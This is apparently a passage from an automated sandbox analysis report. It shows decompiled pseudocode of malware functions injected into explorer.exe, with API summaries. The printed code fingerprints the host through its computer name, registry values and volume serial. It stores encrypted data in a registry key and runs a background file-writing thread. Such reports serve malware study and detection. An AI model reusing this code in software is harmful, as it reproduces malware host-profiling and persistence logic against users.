				void* _v40;
				signed int _v41;
				char _v298;
				char* _t78;
				intOrPtr _t82;
				void* _t84;
				intOrPtr _t87;
				void* _t89;
				intOrPtr _t92;
				void* _t94;
				intOrPtr _t98;
				CHAR* _t109;

				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x101;
				if(GetComputerNameA( &_v298,  &_v12) != 0) {
					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
				}
				_t78 =  *0x7ca25c; // 0x7c2174
				RegOpenKeyExA(0x80000002, _t78, 0, 0x20119,  &_v36); // executed
				_v12 = 0x101;
				_t82 =  *0x7ca0e4; // 0x7c1d14
				_t84 = E007C38B0(_v36, _t82, 0, 0,  &_v298,  &_v12); // executed
				if(_t84 == 0) {
					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t87 =  *0x7ca0e8; // 0x7c1d20
				_t89 = E007C38B0(_v36, _t87, 0, 0,  &_v298,  &_v12); // executed
				if(_t89 == 0) {
					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t92 =  *0x7ca0ec; // 0x7c1d2c
				_t94 = E007C38B0(_v36, _t92, 0, 0,  &_v298,  &_v12); // executed
				if(_t94 == 0) {
					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
				}
				_v12 = 4;
				_v20 = 0;
				_t98 =  *0x7ca0f0; // 0x7c1d3c
				E007C38B0(_v36, _t98, 0, 0,  &_v20,  &_v12); // executed
				E007C3890(_v36);
				_v12 = 0;
				_v28 = 0;
				_v24 = 0;
				_t109 =  *0x7ca268; // 0x7c21d0
				GetVolumeInformationA(_t109, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0); // executed
				_v32 = _v20 ^ _v28 ^ _v24;
				E007C1164(_v32,  &_v298);
				E007C1308(_v8,  &_v298);
				E007C1164(_v16,  &_v298);
				E007C133C(_v8,  &_v298);
				_v40 = _v8;
				_v41 = 0;
				while( *_v40 != 0) {
					_v41 = _v41 ^ E007C118C( *_v40);
					_v40 = _v40 + 2;
				}
				E007C1164(_v41,  &_v298);
				return E007C133C(_v8,  &(( &_v298)[6]));
			}























    0x007c4ba9
    0x007c4bae
    0x007c4bb1
    0x007c4bcb
    0x007c4be8
    0x007c4be8
    0x007c4bf6
    0x007c4c01
    0x007c4c07
    0x007c4c1d
    0x007c4c27
    0x007c4c31
    0x007c4c4e
    0x007c4c4e
    0x007c4c51
    0x007c4c67
    0x007c4c71
    0x007c4c7b
    0x007c4c98
    0x007c4c98
    0x007c4c9b
    0x007c4cb1
    0x007c4cbb
    0x007c4cc5
    0x007c4ce2
    0x007c4ce2
    0x007c4ce5
    0x007c4cee
    0x007c4cfd
    0x007c4d07
    0x007c4d12
    0x007c4d19
    0x007c4d1e
    0x007c4d23
    0x007c4d3a
    0x007c4d40
    0x007c4d4f
    0x007c4d5b
    0x007c4d69
    0x007c4d77
    0x007c4d87
    0x007c4d92
    0x007c4d95
    0x007c4dad
    0x007c4da6
    0x007c4da9
    0x007c4da9
    0x007c4dc0
    0x007c4dde

    APIs
    • GetComputerNameA.KERNEL32(?,00000101), ref: 007C4BC3
    • RegOpenKeyExA.KERNELBASE(80000002,007C2174,00000000,00020119,?), ref: 007C4C01
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    • GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007C4D40
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C4B9B, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173registry
    C-Code - Quality: 100%
    			E007C4B9B(intOrPtr* __eax, void* __edx, intOrPtr _a122) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				long _v24;
				long _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				signed int _v41;
				char _v298;
				char* _t80;
				intOrPtr _t84;
				void* _t86;
				intOrPtr _t89;
				void* _t91;
				intOrPtr _t94;
				void* _t96;
				intOrPtr _t100;
				CHAR* _t111;

				_a122 = _a122 + __edx;
				 *__eax =  *__eax + __eax;
				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x101;
				if(GetComputerNameA( &_v298,  &_v12) != 0) {
					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
				}
				_t80 =  *0x7ca25c; // 0x7c2174
				RegOpenKeyExA(0x80000002, _t80, 0, 0x20119,  &_v36); // executed
				_v12 = 0x101;
				_t84 =  *0x7ca0e4; // 0x7c1d14
				_t86 = E007C38B0(_v36, _t84, 0, 0,  &_v298,  &_v12); // executed
				if(_t86 == 0) {
					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t89 =  *0x7ca0e8; // 0x7c1d20
				_t91 = E007C38B0(_v36, _t89, 0, 0,  &_v298,  &_v12); // executed
				if(_t91 == 0) {
					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t94 =  *0x7ca0ec; // 0x7c1d2c
				_t96 = E007C38B0(_v36, _t94, 0, 0,  &_v298,  &_v12); // executed
				if(_t96 == 0) {
					_v16 = E007C1BA8(_v16, E007C12DC( &_v298),  &_v298);
				}
				_v12 = 4;
				_v20 = 0;
				_t100 =  *0x7ca0f0; // 0x7c1d3c
				E007C38B0(_v36, _t100, 0, 0,  &_v20,  &_v12); // executed
				E007C3890(_v36);
				_v12 = 0;
				_v28 = 0;
				_v24 = 0;
				_t111 =  *0x7ca268; // 0x7c21d0
				GetVolumeInformationA(_t111, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0); // executed
				_v32 = _v20 ^ _v28 ^ _v24;
				E007C1164(_v32,  &_v298);
				E007C1308(_v8,  &_v298);
				E007C1164(_v16,  &_v298);
				E007C133C(_v8,  &_v298);
				_v40 = _v8;
				_v41 = 0;
				while( *_v40 != 0) {
					_v41 = _v41 ^ E007C118C( *_v40);
					_v40 = _v40 + 2;
				}
				E007C1164(_v41,  &_v298);
				return E007C133C(_v8,  &(( &_v298)[6]));
			}























    0x007c4b9b
    0x007c4b9e
    0x007c4ba9
    0x007c4bae
    0x007c4bb1
    0x007c4bcb
    0x007c4be8
    0x007c4be8
    0x007c4bf6
    0x007c4c01
    0x007c4c07
    0x007c4c1d
    0x007c4c27
    0x007c4c31
    0x007c4c4e
    0x007c4c4e
    0x007c4c51
    0x007c4c67
    0x007c4c71
    0x007c4c7b
    0x007c4c98
    0x007c4c98
    0x007c4c9b
    0x007c4cb1
    0x007c4cbb
    0x007c4cc5
    0x007c4ce2
    0x007c4ce2
    0x007c4ce5
    0x007c4cee
    0x007c4cfd
    0x007c4d07
    0x007c4d12
    0x007c4d19
    0x007c4d1e
    0x007c4d23
    0x007c4d3a
    0x007c4d40
    0x007c4d4f
    0x007c4d5b
    0x007c4d69
    0x007c4d77
    0x007c4d87
    0x007c4d92
    0x007c4d95
    0x007c4dad
    0x007c4da6
    0x007c4da9
    0x007c4da9
    0x007c4dc0
    0x007c4dde

    APIs
    • GetComputerNameA.KERNEL32(?,00000101), ref: 007C4BC3
    • RegOpenKeyExA.KERNELBASE(80000002,007C2174,00000000,00020119,?), ref: 007C4C01
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    • GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007C4D40
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C64BC, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 91
    C-Code - Quality: 100%
    			E007C64BC(char* __eax, char __edx, void* __eflags) {
				char* _v8;
				char _v9;
				struct _OSVERSIONINFOA _v168;
				char _v233;
				intOrPtr _t68;
				void* _t73;

				_v9 = __edx;
				_v8 = __eax;
				E007C1258(_v8, 0x51);
				 *_v8 = _v9;
				E007C12B8(_v8 + 0x10, 0x12, 0x7cb719);
				E007C12B8(_v8 + 1, E007C12DC(0x7cb794), 0x7cb794);
				E007C1258( &_v168, 0x9c);
				_v168.dwOSVersionInfoSize = 0x9c;
				GetVersionExA( &_v168);
				E007C1864(_v168.dwMajorVersion,  &_v233);
				 *((char*)(_v8 + 0x22)) = _v233;
				 *((char*)(_v8 + 0x23)) = 0x2e;
				E007C1864(_v168.dwMinorVersion,  &_v233);
				 *((char*)(_v8 + 0x24)) = _v233;
				_t68 =  *0x7ca068; // 0x3
				E007C1864(_t68,  &_v233);
				 *((char*)(_v8 + 0x26)) = _v233;
				if( *0x7ca058 == 0) {
					 *((char*)(_v8 + 0x27)) = 0x30;
				} else {
					 *((char*)(_v8 + 0x27)) = 0x31;
				}
				if( *0x7ca034 == 0) {
					 *((char*)(_v8 + 0x28)) = 0x30;
				} else {
					 *((char*)(_v8 + 0x28)) = 0x31;
				}
				_t73 = E007C3EA0(); // executed
				if(_t73 == 0) {
					 *((char*)(_v8 + 0x25)) = 0x30;
				} else {
					 *((char*)(_v8 + 0x25)) = 0x31;
				}
				 *((intOrPtr*)(_v8 + 0x29)) = E007C5468();
				return E007C1308(_v8 + 0x2d, 0x7cb00c);
			}









    0x007c64c5
    0x007c64c8
    0x007c64d3
    0x007c64de
    0x007c64f0
    0x007c650a
    0x007c651a
    0x007c651f
    0x007c6530
    0x007c6544
    0x007c6555
    0x007c655b
    0x007c656d
    0x007c657e
    0x007c6588
    0x007c658e
    0x007c659f
    0x007c65a9
    0x007c65b7
    0x007c65ab
    0x007c65ae
    0x007c65ae
    0x007c65c2
    0x007c65d0
    0x007c65c4
    0x007c65c7
    0x007c65c7
    0x007c65d4
    0x007c65db
    0x007c65e9
    0x007c65dd
    0x007c65e0
    0x007c65e0
    0x007c65f5
    0x007c660b

    APIs
    • GetVersionExA.KERNEL32(0000009C), ref: 007C6530
      • Part of subcall function 007C1864: wsprintfA.USER32 ref: 007C1874
      • Part of subcall function 007C3EA0: RegCreateKeyExA.KERNELBASE(80000002,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C3ECD
      • Part of subcall function 007C3EA0: RegCreateKeyExA.ADVAPI32(80000001,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C3EF3
      • Part of subcall function 007C5468: GetSystemTime.KERNEL32(?), ref: 007C5472
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C3EA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53registry
    C-Code - Quality: 88%
    			E007C3EA0() {
				signed char _v8;
				void* _v12;
				char _v16;
				char* _t13;
				signed int _t18;
				char* _t25;

				if( *0x7ca034 == 0) {
					_t13 =  *0x7ca260; // 0x7c21a4
					RegCreateKeyExA(0x80000001, _t13, 0, 0, 0, 0xf003f, 0,  &_v12, 0);
				} else {
					_t25 =  *0x7ca260; // 0x7c21a4
					RegCreateKeyExA(0x80000002, _t25, 0, 0, 0, 0xf003f, 0,  &_v12, 0); // executed
				}
				_v16 = 0;
				_t18 = E007C38B0(_v12, "qzdayh", 0, 0, 0,  &_v16); // executed
				asm("sbb eax, eax");
				_v8 =  ~(_t18 & 0xffffff00 | _v16 != 0x00000000);
				E007C3890(_v12);
				return _v8;
			}









    0x007c3ead
    0x007c3ee8
    0x007c3ef3
    0x007c3eaf
    0x007c3ec2
    0x007c3ecd
    0x007c3ecd
    0x007c3efb
    0x007c3f11
    0x007c3f22
    0x007c3f24
    0x007c3f2a
    0x007c3f35

    APIs
    • RegCreateKeyExA.KERNELBASE(80000002,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C3ECD
    • RegCreateKeyExA.ADVAPI32(80000001,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C3EF3
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C471C, Relevance: 4.6, APIs: 3, Instructions: 50thread
    C-Code - Quality: 100%
    			E007C471C(intOrPtr __eax, void __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				long _v32;
				intOrPtr _t34;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v28 = E007C12DC(_v8) + 1;
				_v24 = E007C13DC(_v28 + 4);
				 *_v24 = _v16;
				E007C12B8(_v24 + 4, _v28, _v8);
				if(_v12 == 0) {
					_t34 = E007C4608(_v24); // executed
					_v20 = _t34;
				} else {
					_v32 = CreateThread(0, 0, E007C4608, _v24, 0,  &_v32);
					SetThreadPriority(_v32, 0xfffffff1);
					CloseHandle(_v32);
				}
				return _v20;
			}











    0x007c4722
    0x007c4725
    0x007c4728
    0x007c4734
    0x007c4742
    0x007c474b
    0x007c4759
    0x007c4762
    0x007c479c
    0x007c47a1
    0x007c4764
    0x007c477d
    0x007c4786
    0x007c4790
    0x007c4790
    0x007c47aa

    APIs
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    • CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 007C4777
    • SetThreadPriority.KERNEL32(?,000000F1), ref: 007C4786
    • CloseHandle.KERNEL32(?), ref: 007C4790
      • Part of subcall function 007C4608: CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,20000080,00000000), ref: 007C465B
      • Part of subcall function 007C4608: GetFileSize.KERNEL32(000000FF,00000000), ref: 007C4670
      • Part of subcall function 007C4608: WriteFile.KERNELBASE(000000FF,?,00000200,?,00000000), ref: 007C46A4
      • Part of subcall function 007C4608: FlushFileBuffers.KERNEL32(000000FF), ref: 007C46B6
      • Part of subcall function 007C4608: CloseHandle.KERNEL32(000000FF), ref: 007C46C0
      • Part of subcall function 007C4608: DeleteFileA.KERNELBASE(?), ref: 007C46CA
      • Part of subcall function 007C4608: Sleep.KERNEL32(00000064), ref: 007C46E7
      • Part of subcall function 007C4608: Sleep.KERNEL32(00000064), ref: 007C46FA
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C8BF8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75registry
    C-Code - Quality: 100%
    			E007C8BF8(intOrPtr* __eax, void* __edx) {
				void* _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v117;
				char _v273;
				char _v277;
				char* _t29;
				intOrPtr _t34;
				void* _t36;
				intOrPtr _t40;
				short _t55;

				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				_t29 =  *0x7ca25c; // 0x7c2174
				RegOpenKeyExA(0x80000002, _t29, 0, 0x20119,  &_v4); // executed
				_v8 = 0;
				_v16 = 0x101;
				_t34 =  *0x7ca0e4; // 0x7c1d14
				_t36 = E007C38B0(_v4, _t34, 0, 0,  &_v273,  &_v16); // executed
				if(_t36 == 0) {
					_v12 = E007C1BA8(_v12, E007C12DC( &_v277),  &_v277);
				}
				_v20 = 4;
				_v16 = 0;
				_t40 =  *0x7ca0f0; // 0x7c1d3c
				E007C38B0(_v8, _t40, 0, 0,  &_v16,  &_v20); // executed
				E007C3890(_v8);
				 *0x7ca03c = _v12;
				 *0x7ca040 = _v16;
				 *0x7ca044 = _v12 ^ _v16 ^ 0xaf15f9fc;
				 *0x7ca048 = _v12 ^ 0xbf2bf9fd;
				 *0x7ca04c = _v12;
				 *0x7ca04e = E007C1884(_v12);
				_t55 = _v16;
				 *0x7ca050 = _t55;
				return _t55;
			}
















    0x007c8bf9
    0x007c8bfb
    0x007c8c10
    0x007c8c1b
    0x007c8c23
    0x007c8c26
    0x007c8c3c
    0x007c8c46
    0x007c8c50
    0x007c8c6d
    0x007c8c6d
    0x007c8c70
    0x007c8c79
    0x007c8c88
    0x007c8c92
    0x007c8c9d
    0x007c8ca5
    0x007c8cad
    0x007c8cbd
    0x007c8cca
    0x007c8cd3
    0x007c8ce1
    0x007c8ce7
    0x007c8ceb
    0x007c8cf4

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,007C2174,00000000,00020119,?), ref: 007C8C1B
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C8BFC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73registry
    C-Code - Quality: 100%
    			E007C8BFC() {
				void* _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				char _v277;
				char* _t26;
				intOrPtr _t31;
				void* _t33;
				intOrPtr _t37;
				short _t52;

				_t26 =  *0x7ca25c; // 0x7c2174
				RegOpenKeyExA(0x80000002, _t26, 0, 0x20119,  &_v8); // executed
				_v12 = 0;
				_v20 = 0x101;
				_t31 =  *0x7ca0e4; // 0x7c1d14
				_t33 = E007C38B0(_v8, _t31, 0, 0,  &_v277,  &_v20); // executed
				if(_t33 == 0) {
					_v12 = E007C1BA8(_v12, E007C12DC( &_v277),  &_v277);
				}
				_v20 = 4;
				_v16 = 0;
				_t37 =  *0x7ca0f0; // 0x7c1d3c
				E007C38B0(_v8, _t37, 0, 0,  &_v16,  &_v20); // executed
				E007C3890(_v8);
				 *0x7ca03c = _v12;
				 *0x7ca040 = _v16;
				 *0x7ca044 = _v12 ^ _v16 ^ 0xaf15f9fc;
				 *0x7ca048 = _v12 ^ 0xbf2bf9fd;
				 *0x7ca04c = _v12;
				 *0x7ca04e = E007C1884(_v12);
				_t52 = _v16;
				 *0x7ca050 = _t52;
				return _t52;
			}













    0x007c8c10
    0x007c8c1b
    0x007c8c23
    0x007c8c26
    0x007c8c3c
    0x007c8c46
    0x007c8c50
    0x007c8c6d
    0x007c8c6d
    0x007c8c70
    0x007c8c79
    0x007c8c88
    0x007c8c92
    0x007c8c9d
    0x007c8ca5
    0x007c8cad
    0x007c8cbd
    0x007c8cca
    0x007c8cd3
    0x007c8ce1
    0x007c8ce7
    0x007c8ceb
    0x007c8cf4

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,007C2174,00000000,00020119,?), ref: 007C8C1B
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C3E98, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46registry
    C-Code - Quality: 70%
    			E007C3E98(intOrPtr* __eax, void* __edx) {
				signed char _v8;
				void* _v12;
				char _v16;
				intOrPtr _v117;
				char* _t16;
				signed int _t21;
				char* _t28;

				asm("das");
				asm("das");
				 *__eax =  *__eax + __eax;
				asm("das");
				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				if( *0x7ca034 == 0) {
					_t16 =  *0x7ca260; // 0x7c21a4
					RegCreateKeyExA(0x80000001, _t16, 0, 0, 0, 0xf003f, 0,  &_v12, 0);
				} else {
					_t28 =  *0x7ca260; // 0x7c21a4
					RegCreateKeyExA(0x80000002, _t28, 0, 0, 0, 0xf003f, 0,  &_v12, 0); // executed
				}
				_v16 = 0;
				_t21 = E007C38B0(_v12, "qzdayh", 0, 0, 0,  &_v16); // executed
				asm("sbb eax, eax");
				_v8 =  ~(_t21 & 0xffffff00 | _v16 != 0x00000000);
				E007C3890(_v12);
				return _v8;
			}










    0x007c3e98
    0x007c3e99
    0x007c3e9a
    0x007c3e9c
    0x007c3e9d
    0x007c3e9f
    0x007c3ead
    0x007c3ee8
    0x007c3ef3
    0x007c3eaf
    0x007c3ec2
    0x007c3ecd
    0x007c3ecd
    0x007c3efb
    0x007c3f11
    0x007c3f22
    0x007c3f24
    0x007c3f2a
    0x007c3f35

    APIs
    • RegCreateKeyExA.KERNELBASE(80000002,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C3ECD
    • RegCreateKeyExA.ADVAPI32(80000001,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C3EF3
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C7304, Relevance: 3.1, APIs: 2, Instructions: 102registry
    C-Code - Quality: 100%
    			E007C7304(intOrPtr __eax) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char* _t41;
				char* _t78;
				long _t79;

				_v8 = __eax;
				_v12 = 0;
				if( *0x7ca034 == 0) {
					_t41 =  *0x7ca260; // 0x7c21a4
					_v20 = RegOpenKeyExA(0x80000001, _t41, 0, 0xf003f,  &_v16);
				} else {
					_t78 =  *0x7ca260; // 0x7c21a4
					_t79 = RegOpenKeyExA(0x80000002, _t78, 0, 0xf003f,  &_v16); // executed
					_v20 = _t79;
				}
				if(_v20 == 0) {
					_v28 = 0;
					if(E007C38B0(_v16, 0, 0, 0, 0,  &_v28) == 0 && _v28 > 0) {
						_v24 = E007C13DC(_v28);
						_v36 = _v28;
						_v32 = E007C13DC(_v36);
						E007C38B0(_v16, 0, 0, 0, _v24,  &_v28);
						E007C59BC(_v24, 0x7ca03c, _v28,  &_v36, _v32);
						if(_v36 == 0x188) {
							E007C72C4(_v32);
							_v40 = _v32;
							if( *((intOrPtr*)(_v40 + 0x11d)) == 0 &&  *((intOrPtr*)(_v40 + 0x121)) == 0) {
								E007C12B8(_v8, 0x188, _v32);
								_v12 = 0xffffffff;
							}
						}
						E007C1440(_v24);
						E007C1440(_v32);
					}
					E007C3890(_v16);
				}
				return _v12;
			}















    0x007c730a
    0x007c730f
    0x007c7319
    0x007c7347
    0x007c7358
    0x007c731b
    0x007c7326
    0x007c7331
    0x007c7337
    0x007c7337
    0x007c735f
    0x007c7367
    0x007c7384
    0x007c739c
    0x007c73a2
    0x007c73ad
    0x007c73c2
    0x007c73dd
    0x007c73e9
    0x007c73ee
    0x007c73f6
    0x007c7404
    0x007c7421
    0x007c7426
    0x007c7426
    0x007c7404
    0x007c7430
    0x007c7438
    0x007c7438
    0x007c7440
    0x007c7440
    0x007c744b

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,007C21A4,00000000,000F003F,?), ref: 007C7331
    • RegOpenKeyExA.ADVAPI32(80000001,007C21A4,00000000,000F003F,?), ref: 007C7352
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C7474, Relevance: 3.1, APIs: 2, Instructions: 73registry
    C-Code - Quality: 100%
    			E007C7474(intOrPtr __eax, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				char _v412;
				char* _t35;
				char* _t44;
				void* _t54;

				_t54 = __eflags;
				_v8 = __eax;
				E007C12B8( &_v412, 0x188, _v8);
				E007C72C4( &_v412); // executed
				_v20 = 0;
				E007C5894( &_v412, 0x7ca03c, 0x188, _t54,  &_v20, 0); // executed
				_v16 = E007C13DC(_v20);
				E007C5894( &_v412, 0x7ca03c, 0x188, _t54,  &_v20, _v16); // executed
				if( *0x7ca034 == 0) {
					_t35 =  *0x7ca260; // 0x7c21a4
					RegCreateKeyExA(0x80000001, _t35, 0, 0, 0, 0xf003f, 0,  &_v12, 0);
				} else {
					_t44 =  *0x7ca260; // 0x7c21a4
					RegCreateKeyExA(0x80000002, _t44, 0, 0, 0, 0xf003f, 0,  &_v12, 0); // executed
				}
				E007C3930(_v12, 0, 0, 3, _v16, _v20); // executed
				return E007C3890(_v12);
			}











    0x007c7474
    0x007c747d
    0x007c748e
    0x007c7499
    0x007c74a0
    0x007c74b9
    0x007c74c6
    0x007c74e1
    0x007c74ed
    0x007c7528
    0x007c7533
    0x007c74ef
    0x007c7502
    0x007c750d
    0x007c750d
    0x007c754b
    0x007c755e

    APIs
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    • RegCreateKeyExA.KERNELBASE(80000002,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C750D
    • RegCreateKeyExA.ADVAPI32(80000001,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C7533
      • Part of subcall function 007C3930: RegSetValueExA.KERNELBASE(?,?,?,?,?,?), ref: 007C394C
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C8B98, Relevance: 3.0, APIs: 2, Instructions: 35
    C-Code - Quality: 50%
    			E007C8B98(intOrPtr __eax) {
				intOrPtr _v8;
				intOrPtr _t16;
				void* _t19;

				_v8 = __eax;
				_t23 =  *0x7ca034;
				if( *0x7ca034 == 0) {
					 *0x7cb21c(0, _v8, 0x1a, 0xffffffff);
					E007C133C(_v8, E007C8BF8);
				} else {
					 *0x7cb21c(0, _v8, 0x26, 0xffffffff);
					_t16 =  *0x7ca090; // 0x7c1c10
					E007C133C(_v8, _t16);
				}
				return E007C7560(_v8, _t19, _t23);
			}






    0x007c8b9c
    0x007c8b9f
    0x007c8ba6
    0x007c8bd6
    0x007c8be5
    0x007c8ba8
    0x007c8bb2
    0x007c8bb8
    0x007c8bc2
    0x007c8bc7
    0x007c8bf7

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 007C8BB2
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 007C8BD6
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C8064, Relevance: 3.0, APIs: 2, Instructions: 35registry
    C-Code - Quality: 88%
    			E007C8064(void* __eax, char* __ecx, char* __edx) {
				void* _v8;
				char* _v12;
				char* _v16;
				signed char _v20;
				void* _v24;
				long _t20;
				signed int _t24;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
